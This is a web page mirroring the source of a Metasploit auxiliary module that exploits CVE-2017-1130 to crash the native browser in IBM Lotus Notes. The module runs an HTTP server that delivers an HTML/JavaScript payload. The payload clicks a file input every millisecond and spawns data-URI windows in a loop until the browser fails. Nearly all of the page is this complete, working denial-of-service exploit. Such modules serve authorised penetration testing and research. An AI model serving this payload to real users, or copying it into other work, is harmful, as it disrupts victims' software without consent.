Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/ibm_lotus_notes2.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpServer78def initialize(info = {})9super(10update_info(11info,12'Name' => "IBM Notes Denial Of Service",13'Description' => %q(14This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.15If successful, the browser will crash after viewing the webpage.16),17'License' => MSF_LICENSE,18'Author' => [19'Dhiraj Mishra',20],21'References' => [22['EDB', '42604'],23[ 'CVE', '2017-1130' ]24],25'DisclosureDate' => '2017-08-31',26'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],27'PassiveActions' => [ 'WebServer' ],28'DefaultAction' => 'WebServer'29)30)31end3233def run34exploit # start http server35end3637def setup38@html = %|39<html><body>40<input type="file" id="f">41<script>42var w;43var kins = {};44var i = 1;45f.click();46setInterval("f.click()", 1);47setInterval(function(){48for (var k in kins) {49if (kins[k] && kins[k].status === undefined) {50kins[k].close();51delete kins[k];52}53}54w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');55if (w) {56kins[i] = w;57i++;58}59}, 1);60</script>61</body></html>62|63end6465def on_request_uri(cli, _request)66print_status('Sending response')67send_response(cli, @html)68end69end707172